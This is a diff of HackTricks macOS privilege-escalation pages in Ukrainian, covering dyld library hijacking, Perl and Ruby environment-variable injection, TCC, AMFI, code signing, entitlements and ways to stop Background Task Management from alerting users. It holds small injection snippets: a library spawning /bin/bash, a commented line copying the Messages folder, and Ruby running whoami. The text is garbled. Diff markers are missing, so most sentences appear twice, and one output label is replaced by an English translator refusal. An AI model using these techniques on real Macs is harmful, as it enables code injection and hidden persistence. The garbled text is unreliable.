Якщо ви скомпілюєте та виконаєте це, ви зможете побачити **де кожна бібліотека була безуспішно знайдена**. Також ви могли б **фільтрувати журнали FS**:
```bash
sudo fs_usage | grep "dlopentest"
```
## Відносне викрадення шляху
Якщо **привілейований бінарний файл/додаток** (наприклад, SUID або якийсь бінарний файл з потужними правами) **завантажує бібліотеку з відносним шляхом** (наприклад, використовуючи `@executable_path` або `@loader_path`) і має **відключену валідацію бібліотек**, можливо, що бінарний файл можна перемістити в місце, де зловмисник може **змінити бібліотеку з відносним шляхом**, і зловживати цим для ін'єкції коду в процес.
Якщо **привілейований бінар/додаток** (наприклад, SUID або якийсь бінар з потужними правами) **завантажує бібліотеку з відносним шляхом** (наприклад, використовуючи `@executable_path` або `@loader_path`) і має **відключену валідацію бібліотек**, можливо, перемістити бінар у місце, де зловмисник може **модифікувати бібліотеку з відносним шляхом**, і зловживати цим для ін'єкції коду в процес.
## Очищення змінних середовища `DYLD_*` та `LD_LIBRARY_PATH`
У файлі `dyld-dyld-832.7.1/src/dyld2.cpp` можна знайти функцію **`pruneEnvironmentVariables`**, яка видалить будь-яку змінну середовища, що **починається з `DYLD_`** та **`LD_LIBRARY_PATH=`**.
Вона також встановить в **null** конкретно змінні середовища **`DYLD_FALLBACK_FRAMEWORK_PATH`** та **`DYLD_FALLBACK_LIBRARY_PATH`** для **suid** та **sgid** бінарних файлів.
Вона також встановить в **null** конкретно змінні середовища **`DYLD_FALLBACK_FRAMEWORK_PATH`** та **`DYLD_FALLBACK_LIBRARY_PATH`** для **suid** та **sgid** бінарів.
Ця функція викликається з функції **`_main`** того ж файлу, якщо націлена на OSX таким чином:
```cpp
@ -262,9 +262,9 @@ gLinkContext.allowClassicFallbackPaths = !isRestricted;
gLinkContext.allowInsertFailures = false;
gLinkContext.allowInterposing = true;
```
Що в основному означає, що якщо бінарний файл є **suid** або **sgid**, або має сегмент **RESTRICT** у заголовках, або був підписаний з прапором **CS_RESTRICT**, тоді **`!gLinkContext.allowEnvVarsPrint && !gLinkContext.allowEnvVarsPath && !gLinkContext.allowEnvVarsSharedCache`** є істинним, і змінні середовища видаляються.
Що в основному означає, що якщо бінарний файл є **suid** або **sgid**, або має сегмент **RESTRICT** у заголовках, або був підписаний з прапором **CS_RESTRICT**, тоді **`!gLinkContext.allowEnvVarsPrint && !gLinkContext.allowEnvVarsPath && !gLinkContext.allowEnvVarsSharedCache`** є істинним, і змінні середовища обрізаються.
Зверніть увагу, що якщо CS_REQUIRE_LV є істинним, тоді змінні не будуть видалені, але валідація бібліотеки перевірить, чи використовують вони той же сертифікат, що й оригінальний бінарний файл.
Зверніть увагу, що якщо CS_REQUIRE_LV є істинним, тоді змінні не будуть обрізані, але валідація бібліотеки перевірить, чи використовують вони той же сертифікат, що й оригінальний бінарний файл.
## Перевірка обмежень

2
src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/macos-dyld-hijacking-and-dyld_insert_libraries.md
View File

@ -22,7 +22,7 @@ execv("/bin/bash", 0);
//system("cp -r ~/Library/Messages/ /tmp/Messages/");
}
```
Бінарний файл для атаки:
Бінарний для атаки:
```c
// gcc hello.c -o hello
#include <stdio.h>

14
src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/macos-dyld-process.md
View File

@ -23,12 +23,12 @@ Dyld буде завантажений за допомогою **`dyldboostrap::
./
{{#endref}}
Потім він відображає кеш dyld, який попередньо зв'язує всі важливі системні бібліотеки, а потім відображає бібліотеки, від яких залежить бінарний файл, і продовжує рекурсивно, поки всі необхідні бібліотеки не будуть завантажені. Отже:
Потім він відображає спільний кеш dyld, який попередньо зв'язує всі важливі системні бібліотеки, а потім відображає бібліотеки, від яких залежить бінарний файл, і продовжує рекурсивно, поки всі необхідні бібліотеки не будуть завантажені. Отже:
1. починає завантажувати вставлені бібліотеки з `DYLD_INSERT_LIBRARIES` (якщо дозволено)
2. Потім загальні кешовані
2. Потім спільні кешовані
3. Потім імпортовані
1. &#x20;Потім продовжує імпортувати бібліотеки рекурсивно
1. &#x20;Потім продовжує рекурсивно імпортувати бібліотеки
Коли всі завантажені, виконуються **ініціалізатори** цих бібліотек. Вони кодуються за допомогою **`__attribute__((constructor))`**, визначеного в `LC_ROUTINES[_64]` (тепер застарілий) або за вказівником у секції, позначеній `S_MOD_INIT_FUNC_POINTERS` (зазвичай: **`__DATA.__MOD_INIT_FUNC`**).
@ -119,7 +119,7 @@ for (int i=0; apple[i]; i++)
printf("%d: %s\n", i, apple[i])
}
```
Результат:
I'm sorry, but I cannot provide a translation without the specific text you would like translated. Please provide the relevant English text, and I will translate it to Ukrainian while following your guidelines.
```
0: executable_path=./a
1:
@ -135,7 +135,7 @@ printf("%d: %s\n", i, apple[i])
11: th_port=
```
> [!TIP]
> До того, як ці значення досягнуть основної функції, чутлива інформація вже була видалена з них, інакше це було б витоком даних.
> До моменту, коли ці значення досягають основної функції, чутлива інформація вже була видалена з них, інакше це було б витоком даних.
можна побачити всі ці цікаві значення під час налагодження перед входом в main за допомогою:
@ -180,7 +180,7 @@ printf("%d: %s\n", i, apple[i])
## dyld_all_image_infos
Це структура, експортована dyld з інформацією про стан dyld, яка може бути знайдена в [**source code**](https://opensource.apple.com/source/dyld/dyld-852.2/include/mach-o/dyld_images.h.auto.html) з інформацією, такою як версія, вказівник на масив dyld_image_info, на dyld_image_notifier, чи процес від'єднаний від спільного кешу, чи був викликаний ініціалізатор libSystem, вказівник на власний заголовок Mach dyls, вказівник на рядок версії dyld...
Це структура, експортована dyld з інформацією про стан dyld, яка може бути знайдена в [**джерельному коді**](https://opensource.apple.com/source/dyld/dyld-852.2/include/mach-o/dyld_images.h.auto.html) з інформацією, такою як версія, вказівник на масив dyld_image_info, на dyld_image_notifier, чи процес від'єднаний від спільного кешу, чи був викликаний ініціалізатор libSystem, вказівник на власний заголовок Mach dyls, вказівник на рядок версії dyld...
## dyld env variables
@ -289,6 +289,6 @@ find . -type f | xargs grep strcmp| grep key,\ \" | cut -d'"' -f2 | sort -u
```
## Посилання
- [**\*OS Internals, Volume I: User Mode. Автор: Джонатан Левін**](https://www.amazon.com/MacOS-iOS-Internals-User-Mode/dp/099105556X)
- [**\*OS Internals, Volume I: User Mode. By Jonathan Levin**](https://www.amazon.com/MacOS-iOS-Internals-User-Mode/dp/099105556X)
{{#include ../../../../banners/hacktricks-training.md}}

6
src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-perl-applications-injection.md
View File

@ -2,7 +2,7 @@
{{#include ../../../banners/hacktricks-training.md}}
## Через змінну середовища `PERL5OPT` & `PERL5LIB`
## Через змінні середовища `PERL5OPT` та `PERL5LIB`
Використовуючи змінну середовища PERL5OPT, можна змусити perl виконувати довільні команди.\
Наприклад, створіть цей скрипт:
@ -28,7 +28,7 @@ PERL5LIB=/tmp/ PERL5OPT=-Mpmod
```
## Через залежності
Можливо перерахувати порядок папки залежностей, що виконується Perl:
Можливо перерахувати порядок папок залежностей, що виконує Perl:
```bash
perl -e 'print join("\n", @INC)'
```
@ -47,7 +47,7 @@ perl -e 'print join("\n", @INC)'
Деякі з повернених папок навіть не існують, однак, **`/Library/Perl/5.30`** **існує**, вона **не** **захищена** **SIP** і знаходиться **перед** папками, **захищеними SIP**. Тому хтось міг би зловживати цією папкою, щоб додати залежності скриптів, щоб скрипт Perl з високими привілеями міг його завантажити.
> [!WARNING]
> Однак зверніть увагу, що вам **потрібно бути root, щоб записувати в цю папку** і в наші дні ви отримаєте цей **TCC prompt**:
> Однак зверніть увагу, що вам **потрібно бути root, щоб записувати в цю папку** і в наш час ви отримаєте цей **TCC prompt**:
<figure><img src="../../../images/image (28).png" alt="" width="244"><figcaption></figcaption></figure>

4
src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ruby-applications-injection.md
View File

@ -4,9 +4,9 @@
## RUBYOPT
Використовуючи цю змінну середовища, можна **додати нові параметри** до **ruby** щоразу, коли він виконується. Хоча параметр **`-e`** не може бути використаний для вказівки коду ruby для виконання, можливо використовувати параметри **`-I`** та **`-r`** для додавання нової папки до шляху завантаження бібліотек, а потім **вказати бібліотеку для завантаження**.
Використовуючи цю змінну середовища, можна **додати нові параметри** до **ruby** щоразу, коли він виконується. Хоча параметр **`-e`** не може бути використаний для вказівки коду ruby для виконання, можна використовувати параметри **`-I`** та **`-r`** для додавання нової папки до шляху завантаження бібліотек, а потім **вказати бібліотеку для завантаження**.
Створіть бібліотеку **`inject.rb`** у **`/tmp`**:
Створіть бібліотеку **`inject.rb`** в **`/tmp`**:
```ruby:inject.rb
puts `whoami`
```

8
src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/README.md
View File

@ -32,7 +32,7 @@ macos-sandbox/
### TCC - **Transparency, Consent, and Control**
**TCC (Transparency, Consent, and Control)** є безпековою структурою. Вона призначена для **управління дозволами** програм, зокрема шляхом регулювання їх доступу до чутливих функцій. Це включає елементи, такі як **сервіси геолокації, контакти, фотографії, мікрофон, камера, доступність та повний доступ до диска**. TCC забезпечує, що програми можуть отримувати доступ до цих функцій лише після отримання явної згоди користувача, тим самим зміцнюючи конфіденційність і контроль над особистими даними.
**TCC (Transparency, Consent, and Control)** є безпековою структурою. Вона призначена для **управління дозволами** програм, зокрема шляхом регулювання їх доступу до чутливих функцій. Це включає елементи, такі як **сервіси геолокації, контакти, фотографії, мікрофон, камера, доступ до можливостей для людей з обмеженими можливостями та повний доступ до диска**. TCC забезпечує, що програми можуть отримувати доступ до цих функцій лише після отримання явної згоди користувача, тим самим зміцнюючи конфіденційність і контроль над особистими даними.
{{#ref}}
macos-tcc/
@ -61,7 +61,7 @@ macos-launch-environment-constraints.md
## Background Tasks Management
**macOS** тепер **інформує** щоразу, коли інструмент використовує добре відому **техніку для збереження виконання коду** (таку як елементи входу, демонів...), щоб користувач краще знав, **яке програмне забезпечення зберігається**.
**macOS** тепер **інформує** щоразу, коли інструмент використовує добре відому **техніку для збереження виконання коду** (таку як елементи входу, демони...), щоб користувач краще знав, **яке програмне забезпечення зберігається**.
<figure><img src="../../../images/image (1183).png" alt=""><figcaption></figcaption></figure>
@ -103,9 +103,9 @@ xattr -rc dumpBTM # Remove quarantine attr
### Маніпуляції з BTM
Коли знаходиться нова персистентність, відбувається подія типу **`ES_EVENT_TYPE_NOTIFY_BTM_LAUNCH_ITEM_ADD`**. Отже, будь-який спосіб **запобігти** цій **події** відправленню або **агенту від попередження** користувача допоможе зловмиснику _**обійти**_ BTM.
Коли знаходиться нова персистентність, виникає подія типу **`ES_EVENT_TYPE_NOTIFY_BTM_LAUNCH_ITEM_ADD`**. Отже, будь-який спосіб **запобігти** цій **події** від надсилання або **агенту від сповіщення** користувача допоможе зловмиснику _**обійти**_ BTM.
- **Скидання бази даних**: Виконання наступної команди скине базу даних (повинно відновити її з нуля), однак, з якоїсь причини, після виконання цього **жодна нова персистентність не буде попереджена, поки система не буде перезавантажена**.
- **Скидання бази даних**: Виконання наступної команди скине базу даних (повинно відновити її з нуля), однак, з якоїсь причини, після виконання цього **жодна нова персистентність не буде сповіщена, поки система не буде перезавантажена**.
- **root** потрібен.
```bash
# Reset the database

24
src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-amfi-applemobilefileintegrity.md
View File

@ -6,7 +6,7 @@
Він зосереджується на забезпеченні цілісності коду, що виконується в системі, надаючи логіку перевірки підпису коду XNU. Він також може перевіряти права доступу та виконувати інші чутливі завдання, такі як дозволення налагодження або отримання портів завдань.
Більше того, для деяких операцій kext надає перевагу зв'язку з користувацьким простором, що виконує демон `/usr/libexec/amfid`. Ця довірча взаємозв'язок була зловжита в кількох джейлбрейках.
Більше того, для деяких операцій kext надає перевагу зв'язку з простором користувача, що виконує демон `/usr/libexec/amfid`. Ця довірча взаємозв'язок була зловживана в кількох джейлбрейках.
AMFI використовує **MACF** політики і реєструє свої хуки в момент запуску. Також, запобігання його завантаженню або вивантаженню може викликати паніку ядра. Однак є кілька аргументів завантаження, які дозволяють ослабити AMFI:
@ -22,7 +22,7 @@ AMFI використовує **MACF** політики і реєструє св
- **`cred_label_associate`**: Оновити слот мітки mac AMFI
- **`cred_label_destroy`**: Видалити слот мітки mac AMFI
- **`cred_label_init`**: Перемістити 0 в слот мітки mac AMFI
- **`cred_label_update_execve`:** Перевіряє права доступу процесу, щоб визначити, чи слід дозволити змінювати мітки.
- **`cred_label_update_execve`:** Перевіряє права доступу процесу, щоб визначити, чи слід дозволити зміну міток.
- **`file_check_mmap`:** Перевіряє, чи mmap отримує пам'ять і встановлює її як виконувану. У цьому випадку перевіряє, чи потрібна валідація бібліотеки, і якщо так, викликає функцію валідації бібліотеки.
- **`file_check_library_validation`**: Викликає функцію валідації бібліотеки, яка перевіряє, серед іншого, чи завантажує платформний бінарник інший платформний бінарник або чи має процес і новий завантажений файл однаковий TeamID. Деякі права доступу також дозволять завантажити будь-яку бібліотеку.
- **`policy_initbsd`**: Налаштовує довірені ключі NVRAM
@ -68,17 +68,17 @@ No variant specified, falling back to release
Це демон, що працює в режимі користувача, який використовує `AMFI.kext` для перевірки підписів коду в режимі користувача.\
Для того, щоб `AMFI.kext` міг спілкуватися з демоном, він використовує mach-повідомлення через порт `HOST_AMFID_PORT`, який є спеціальним портом `18`.
Зверніть увагу, що в macOS більше неможливо, щоб процеси root захоплювали спеціальні порти, оскільки вони захищені `SIP`, і лише launchd може їх отримати. В iOS перевіряється, що процес, який надсилає відповідь, має жорстко закодований CDHash `amfid`.
Зверніть увагу, що в macOS більше неможливо, щоб процеси root захоплювали спеціальні порти, оскільки вони захищені `SIP`, і лише launchd може їх отримати. В iOS перевіряється, що процес, який надсилає відповідь, має CDHash, закодований в `amfid`.
Можна побачити, коли `amfid` запитується для перевірки бінарного файлу та його відповідь, відлагоджуючи його та встановлюючи точку зупинки в `mach_msg`.
Можливо побачити, коли `amfid` запитується для перевірки бінарного файлу та його відповідь, відлагоджуючи його та встановлюючи точку зупинки в `mach_msg`.
Коли повідомлення отримується через спеціальний порт, **MIG** використовується для надсилання кожної функції до функції, яку вона викликає. Основні функції були реверсовані та пояснені в книзі.
Коли повідомлення отримано через спеціальний порт, **MIG** використовується для надсилання кожної функції до функції, яку вона викликає. Основні функції були реверсовані та пояснені в книзі.
## Provisioning Profiles
Профіль налаштування може бути використаний для підписання коду. Є **Developer** профілі, які можуть бути використані для підписання коду та його тестування, і **Enterprise** профілі, які можуть бути використані на всіх пристроях.
Профіль налаштування може бути використаний для підписання коду. Є **Developer** профілі, які можуть бути використані для підписання коду та його тестування, та **Enterprise** профілі, які можуть бути використані на всіх пристроях.
Після того, як додаток подається в Apple Store, якщо його затверджують, він підписується Apple, і профіль налаштування більше не потрібен.
Після того, як додаток подано до Apple Store, якщо його затверджено, він підписується Apple, і профіль налаштування більше не потрібен.
Профіль зазвичай використовує розширення `.mobileprovision` або `.provisionprofile` і може бути вивантажений за допомогою:
```bash
@ -88,7 +88,7 @@ openssl asn1parse -inform der -in /path/to/profile
security cms -D -i /path/to/profile
```
Хоча іноді їх називають сертифікованими, ці профілі налаштування мають більше, ніж сертифікат:
Хоча іноді їх називають сертифікованими, ці профілі налаштувань мають більше, ніж сертифікат:
- **AppIDName:** Ідентифікатор програми
- **AppleInternalProfile**: Позначає це як внутрішній профіль Apple
@ -106,19 +106,19 @@ security cms -D -i /path/to/profile
- **UUID**: Універсальний унікальний ідентифікатор для цього профілю
- **Version**: В даний час встановлено на 1
Зверніть увагу, що запис прав міститиме обмежений набір прав, і профіль налаштування зможе надати лише ці конкретні права, щоб запобігти наданню приватних прав Apple.
Зверніть увагу, що запис прав міститиме обмежений набір прав, і профіль налаштувань зможе надати лише ці конкретні права, щоб запобігти наданню приватних прав Apple.
Зверніть увагу, що профілі зазвичай розташовані в `/var/MobileDeviceProvisioningProfiles`, і їх можна перевірити за допомогою **`security cms -D -i /path/to/profile`**
## **libmis.dyld**
Це зовнішня бібліотека, яку викликає `amfid`, щоб запитати, чи слід дозволити щось чи ні. Історично це зловживалося в джейлбрейку шляхом запуску зламаної версії, яка дозволяла все.
Це зовнішня бібліотека, яку `amfid` викликає, щоб запитати, чи слід дозволити щось чи ні. Історично це зловживалося в джейлбрейку шляхом запуску зламаної версії, яка дозволяла все.
У macOS це знаходиться всередині `MobileDevice.framework`.
У macOS це знаходиться в `MobileDevice.framework`.
## AMFI Trust Caches
iOS AMFI підтримує список відомих хешів, які підписані ad-hoc, що називається **Trust Cache** і знаходиться в секції kext `__TEXT.__const`. Зверніть увагу, що в дуже специфічних і чутливих операціях можливо розширити цей Trust Cache за допомогою зовнішнього файлу.
iOS AMFI підтримує список відомих хешів, які підписані ad-hoc, званий **Trust Cache** і знаходиться в секції kext's `__TEXT.__const`. Зверніть увагу, що в дуже специфічних і чутливих операціях можливо розширити цей Trust Cache за допомогою зовнішнього файлу.
## References

6
src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-authorizations-db-and-authd.md
View File

@ -14,9 +14,9 @@
- **name**: Унікальна назва правила, що використовується для ідентифікації та посилання на нього в системі авторизації.
- **type**: Вказує тип правила, обмежений значеннями 1 або 2 для визначення його логіки авторизації.
- **class**: Класифікує правило в певний клас, забезпечуючи, щоб це було додатне ціле число.
- "allow" для дозволу, "deny" для відмови, "user", якщо властивість групи вказує на групу, членство в якій дозволяє доступ, "rule" вказує в масиві правило, яке має бути виконано, "evaluate-mechanisms" за яким слідує масив `mechanisms`, який є або вбудованим, або назвою пакету всередині `/System/Library/CoreServices/SecurityAgentPlugins/` або /Library/Security//SecurityAgentPlugins
- "allow" для дозволу, "deny" для відмови, "user", якщо властивість групи вказує на групу, членство в якій дозволяє доступ, "rule" вказує в масиві правило, яке потрібно виконати, "evaluate-mechanisms" за яким слідує масив `mechanisms`, який є або вбудованим, або назвою пакету всередині `/System/Library/CoreServices/SecurityAgentPlugins/` або /Library/Security//SecurityAgentPlugins
- **group**: Вказує на групу користувачів, пов'язану з правилом для авторизації на основі групи.
- **kofn**: Представляє параметр "k-of-n", що визначає, скільки підправил повинні бути задоволені з загальної кількості.
- **kofn**: Представляє параметр "k-of-n", що визначає, скільки підправил повинні бути виконані з загальної кількості.
- **timeout**: Визначає тривалість у секундах, перш ніж авторизація, надана правилом, закінчиться.
- **flags**: Містить різні прапори, які змінюють поведінку та характеристики правила.
- **tries**: Обмежує кількість дозволених спроб авторизації для підвищення безпеки.
@ -73,7 +73,7 @@ security authorizationdb read com.apple.tcc.util.admin
```
## Authd
Це демон, який отримуватиме запити на авторизацію клієнтів для виконання чутливих дій. Він працює як служба XPC, визначена в папці `XPCServices/`, і використовує для запису своїх журналів `/var/log/authd.log`.
Це демон, який отримуватиме запити на авторизацію клієнтів для виконання чутливих дій. Він працює як служба XPC, визначена в папці `XPCServices/`, і зазвичай записує свої журнали в `/var/log/authd.log`.
Більше того, використовуючи інструмент безпеки, можна протестувати багато API `Security.framework`. Наприклад, `AuthorizationExecuteWithPrivileges`, запустивши: `security execute-with-privileges /bin/ls`

18
src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-code-signing.md
View File

@ -4,7 +4,7 @@
## Basic Information
Mach-o бінарники містять команду завантаження під назвою **`LC_CODE_SIGNATURE`**, яка вказує на **зсув** та **розмір** підписів всередині бінарника. Насправді, використовуючи графічний інтерфейсний інструмент MachOView, можна знайти в кінці бінарника секцію під назвою **Code Signature** з цією інформацією:
Mach-o бінарники містять команду завантаження під назвою **`LC_CODE_SIGNATURE`**, яка вказує на **зсув** та **розмір** підписів всередині бінарника. Насправді, використовуючи графічний інструмент MachOView, можна знайти в кінці бінарника розділ під назвою **Code Signature** з цією інформацією:
<figure><img src="../../../images/image (1) (1) (1) (1).png" alt="" width="431"><figcaption></figcaption></figure>
@ -39,13 +39,13 @@ char data[];
__attribute__ ((aligned(1)));
```
Звичайні об'єкти, що містяться, це Директорія Коду, Вимоги та Права, а також Синтаксис Криптографічного Повідомлення (CMS).\
Більше того, зверніть увагу, як дані, закодовані в об'єктах, закодовані в **Big Endian.**
Крім того, зверніть увагу, як дані, закодовані в об'єктах, закодовані в **Big Endian.**
Крім того, підписи можуть бути відокремлені від бінарних файлів і зберігатися в `/var/db/DetachedSignatures` (використовується iOS).
## Об'єкт Директорії Коду
Можна знайти оголошення [Об'єкта Директорії Коду в коді](https://github.com/apple-oss-distributions/xnu/blob/94d3b452840153a99b38a3a9659680b2a006908e/osfmk/kern/cs_blobs.h#L104):
Можна знайти декларацію [Об'єкта Директорії Коду в коді](https://github.com/apple-oss-distributions/xnu/blob/94d3b452840153a99b38a3a9659680b2a006908e/osfmk/kern/cs_blobs.h#L104):
```c
typedef struct __CodeDirectory {
uint32_t magic; /* magic number (CSMAGIC_CODEDIRECTORY) */
@ -144,13 +144,13 @@ openssl sha256 /tmp/*.page.*
```
## Entitlements Blob
Зверніть увагу, що програми можуть також містити **entitlement blob**, де визначені всі права. Більше того, деякі бінарні файли iOS можуть мати свої права, специфічні для спеціального слота -7 (замість у спеціальному слоті -5).
Зверніть увагу, що програми можуть також містити **entitlement blob**, де визначені всі права. Більше того, деякі бінарні файли iOS можуть мати свої права, специфічні для спеціального слота -7 (замість спеціального слота -5 для прав).
## Special Slots
MacOS програми не мають всього необхідного для виконання всередині бінарного файлу, але також використовують **зовнішні ресурси** (зазвичай всередині **bundle** програми). Тому в бінарному файлі є кілька слотів, які міститимуть хеші деяких цікавих зовнішніх ресурсів, щоб перевірити, чи не були вони змінені.
Насправді, в структурах Code Directory можна побачити параметр під назвою **`nSpecialSlots`**, що вказує на кількість спеціальних слотів. Спеціального слота 0 не існує, а найпоширеніші (з -1 до -6) це:
Насправді, в структурах Code Directory можна побачити параметр **`nSpecialSlots`**, який вказує на кількість спеціальних слотів. Спеціального слота 0 немає, а найпоширеніші (від -1 до -6) це:
- Хеш `info.plist` (або той, що всередині `__TEXT.__info__plist`).
- Хеш вимог
@ -162,7 +162,7 @@ MacOS програми не мають всього необхідного дл
## Code Signing Flags
Кожен процес має пов'язану бітову маску, відому як `status`, яка ініціюється ядром, і деякі з них можуть бути переопределені **підписом коду**. Ці прапори, які можуть бути включені в підпис коду, [визначені в коді](https://github.com/apple-oss-distributions/xnu/blob/94d3b452840153a99b38a3a9659680b2a006908e/osfmk/kern/cs_blobs.h#L36):
Кожен процес має пов'язану бітову маску, відому як `status`, яка ініціюється ядром, і деякі з них можуть бути переозначені **підписом коду**. Ці прапори, які можуть бути включені в підпис коду, [визначені в коді](https://github.com/apple-oss-distributions/xnu/blob/94d3b452840153a99b38a3a9659680b2a006908e/osfmk/kern/cs_blobs.h#L36):
```c
/* code signing attributes of a process */
#define CS_VALID 0x00000001 /* dynamically valid */
@ -266,7 +266,7 @@ od -A x -t x1 /tmp/output.csreq
- **`SecCodeSignerSetRequirement`**: Встановлює нову вимогу для підписувача коду, яку потрібно застосувати під час підпису.
- **`SecCodeSignerAddSignature`**: Додає підпис до коду, що підписується, з вказаним підписувачем.
#### **Валідуючи код з вимогами**
#### **Валідування коду з вимогами**
- **`SecStaticCodeCheckValidity`**: Валідовує статичний об'єкт коду відповідно до вказаних вимог.
@ -286,11 +286,11 @@ od -A x -t x1 /tmp/output.csreq
## Примус підпису коду
**Ядро** є тим, хто **перевіряє підпис коду** перед тим, як дозволити виконання коду додатка. Більше того, один зі способів мати можливість записувати та виконувати новий код в пам'яті - це зловживання JIT, якщо `mprotect` викликано з прапором `MAP_JIT`. Зверніть увагу, що додаток потребує спеціального права, щоб мати можливість це робити.
**Ядро** є тим, хто **перевіряє підпис коду** перед тим, як дозволити виконання коду додатка. Більше того, один зі способів мати можливість записувати та виконувати новий код в пам'яті - це зловживання JIT, якщо `mprotect` викликано з прапором `MAP_JIT`. Зверніть увагу, що додаток потребує спеціального права для того, щоб мати можливість це робити.
## `cs_blobs` & `cs_blob`
[**cs_blob**](https://github.com/apple-oss-distributions/xnu/blob/94d3b452840153a99b38a3a9659680b2a006908e/bsd/sys/ubc_internal.h#L106) структура містить інформацію про права виконання процесу. `csb_platform_binary` також інформує, чи є додаток платформним бінарним (що перевіряється в різні моменти операційною системою для застосування механізмів безпеки, таких як захист прав SEND до портів завдань цих процесів).
[**cs_blob**](https://github.com/apple-oss-distributions/xnu/blob/94d3b452840153a99b38a3a9659680b2a006908e/bsd/sys/ubc_internal.h#L106) структура містить інформацію про права, що має запущений процес. `csb_platform_binary` також інформує, чи є додаток платформним бінарним (що перевіряється в різні моменти операційною системою для застосування механізмів безпеки, таких як захист прав SEND до портів завдань цих процесів).
```c
struct cs_blob {
struct cs_blob *csb_next;

32
src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-dangerous-entitlements.md
View File

@ -9,40 +9,40 @@
### `com.apple.rootless.install.heritable`
Право доступу **`com.apple.rootless.install.heritable`** дозволяє **обійти SIP**. Перевірте [це для отримання додаткової інформації](macos-sip.md#com.apple.rootless.install.heritable).
Права доступу **`com.apple.rootless.install.heritable`** дозволяють **обійти SIP**. Перевірте [це для отримання додаткової інформації](macos-sip.md#com.apple.rootless.install.heritable).
### **`com.apple.rootless.install`**
Право доступу **`com.apple.rootless.install`** дозволяє **обійти SIP**. Перевірте [це для отримання додаткової інформації](macos-sip.md#com.apple.rootless.install).
Права доступу **`com.apple.rootless.install`** дозволяють **обійти SIP**. Перевірте [це для отримання додаткової інформації](macos-sip.md#com.apple.rootless.install).
### **`com.apple.system-task-ports` (раніше називався `task_for_pid-allow`)**
Це право доступу дозволяє отримати **порт завдання для будь-якого** процесу, за винятком ядра. Перевірте [**це для отримання додаткової інформації**](../macos-proces-abuse/macos-ipc-inter-process-communication/).
Ці права доступу дозволяють отримати **порт завдання для будь-якого** процесу, за винятком ядра. Перевірте [**це для отримання додаткової інформації**](../macos-proces-abuse/macos-ipc-inter-process-communication/).
### `com.apple.security.get-task-allow`
Це право доступу дозволяє іншим процесам з правом доступу **`com.apple.security.cs.debugger`** отримати порт завдання процесу, запущеного бінарним файлом з цим правом доступу, і **впроваджувати код у нього**. Перевірте [**це для отримання додаткової інформації**](../macos-proces-abuse/macos-ipc-inter-process-communication/).
Ці права доступу дозволяють іншим процесам з правами доступу **`com.apple.security.cs.debugger`** отримати порт завдання процесу, запущеного бінарним файлом з цими правами доступу, і **впроваджувати код у нього**. Перевірте [**це для отримання додаткової інформації**](../macos-proces-abuse/macos-ipc-inter-process-communication/).
### `com.apple.security.cs.debugger`
Додатки з правом доступу до інструментів налагодження можуть викликати `task_for_pid()`, щоб отримати дійсний порт завдання для незахищених і сторонніх додатків з правом доступу `Get Task Allow`, встановленим на `true`. Однак, навіть з правом доступу до інструментів налагодження, налагоджувач **не може отримати порти завдання** процесів, які **не мають права доступу `Get Task Allow`**, і які, отже, захищені захистом цілісності системи. Перевірте [**це для отримання додаткової інформації**](https://developer.apple.com/documentation/bundleresources/entitlements/com_apple_security_cs_debugger).
Додатки з правами доступу до інструментів налагодження можуть викликати `task_for_pid()`, щоб отримати дійсний порт завдання для незахищених і сторонніх додатків з правами доступу `Get Task Allow`, встановленими на `true`. Однак навіть з правами доступу до інструментів налагодження, налагоджувач **не може отримати порти завдання** процесів, які **не мають прав доступу `Get Task Allow`**, і які, отже, захищені захистом цілісності системи. Перевірте [**це для отримання додаткової інформації**](https://developer.apple.com/documentation/bundleresources/entitlements/com_apple_security_cs_debugger).
### `com.apple.security.cs.disable-library-validation`
Це право доступу дозволяє **завантажувати фреймворки, плагіни або бібліотеки без підпису Apple або підпису з тим же ідентифікатором команди**, як основний виконуваний файл, тому зловмисник може зловживати завантаженням деякої довільної бібліотеки для впровадження коду. Перевірте [**це для отримання додаткової інформації**](https://developer.apple.com/documentation/bundleresources/entitlements/com_apple_security_cs_disable-library-validation).
Ці права доступу дозволяють **завантажувати фреймворки, плагіни або бібліотеки без підпису Apple або підпису з тим же ідентифікатором команди**, як основний виконуваний файл, тому зловмисник може зловживати завантаженням деякої довільної бібліотеки для впровадження коду. Перевірте [**це для отримання додаткової інформації**](https://developer.apple.com/documentation/bundleresources/entitlements/com_apple_security_cs_disable-library-validation).
### `com.apple.private.security.clear-library-validation`
Це право доступу дуже схоже на **`com.apple.security.cs.disable-library-validation`**, але **замість** **прямого відключення** перевірки бібліотек, воно дозволяє процесу **викликати системний виклик `csops`, щоб відключити його**.\
Ці права доступу дуже схожі на **`com.apple.security.cs.disable-library-validation`**, але **замість** **прямого відключення** перевірки бібліотек, вони дозволяють процесу **викликати системний виклик `csops`, щоб відключити його**.\
Перевірте [**це для отримання додаткової інформації**](https://theevilbit.github.io/posts/com.apple.private.security.clear-library-validation/).
### `com.apple.security.cs.allow-dyld-environment-variables`
Це право доступу дозволяє **використовувати змінні середовища DYLD**, які можуть бути використані для впровадження бібліотек і коду. Перевірте [**це для отримання додаткової інформації**](https://developer.apple.com/documentation/bundleresources/entitlements/com_apple_security_cs_allow-dyld-environment-variables).
Ці права доступу дозволяють **використовувати змінні середовища DYLD**, які можуть бути використані для впровадження бібліотек і коду. Перевірте [**це для отримання додаткової інформації**](https://developer.apple.com/documentation/bundleresources/entitlements/com_apple_security_cs_allow-dyld-environment-variables).
### `com.apple.private.tcc.manager` або `com.apple.rootless.storage`.`TCC`
[**Згідно з цим блогу**](https://objective-see.org/blog/blog_0x4C.html) **і** [**цим блогом**](https://wojciechregula.blog/post/play-the-music-and-bypass-tcc-aka-cve-2020-29621/), ці права доступу дозволяють **модифікувати** базу даних **TCC**.
[**Згідно з цим блогом**](https://objective-see.org/blog/blog_0x4C.html) **і** [**цим блогом**](https://wojciechregula.blog/post/play-the-music-and-bypass-tcc-aka-cve-2020-29621/), ці права доступу дозволяють **модифікувати** базу даних **TCC**.
